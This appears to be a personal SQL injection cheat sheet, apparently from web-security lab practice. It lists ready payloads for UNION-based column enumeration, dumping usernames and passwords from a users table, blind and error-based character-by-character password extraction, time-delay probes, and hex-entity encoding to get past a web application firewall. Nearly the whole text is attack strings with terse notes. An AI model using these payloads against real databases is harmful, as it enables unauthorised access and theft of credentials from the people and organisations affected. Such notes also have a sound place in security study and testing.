'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
SQLi union
Need to determine number of columns
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
#for oracle
' UNION SELECT NULL FROM DUAL--
The payloads described use the double-dash comment sequence -- to comment out the remainder of the original query following the injection point.
On MySQL, the double-dash sequence must be followed by a space. Alternatively, the hash character # can be used to identify a comment.
Test for string column
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
Multiple column in one
' UNION SELECT username || '~' || password FROM users--
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Blind SQLi
Start with simple condition and compare results
…xyz' AND '1'='1
…xyz' AND '1'='2
#table exist
xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
#user exist
xyz' and (select 'a' from users where username = 'administrator')='a'
#password length
xyz' and (select 'a' from users where username = 'administrator' and length(password)=20)='a'
#password chars
xyz' and (SELECT SUBSTRING(password,1,1) from users where username = 'administrator')='b'
If it works try with more complex conditions
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a
Error blind sqli
If simple condition not change behavior, try to do error of db
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
Visible error sqli
Especially string literal when other type expected, try CAST
CAST((SELECT example_column FROM example_table) AS int)--
' AND 1=CAST((SELECT username FROM users) AS int)--
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
Time Delays
#simple condition
'; IF (1=2) WAITFOR DELAY '0:0:10'-
#user condition
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
If waf try to bypass with Hackvector encode with hex_entities/dec_entities
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>
1
</productId><storeId><@hex_entities>1 union select password from users where username='administrator'<@/hex_entities></storeId></stockCheck>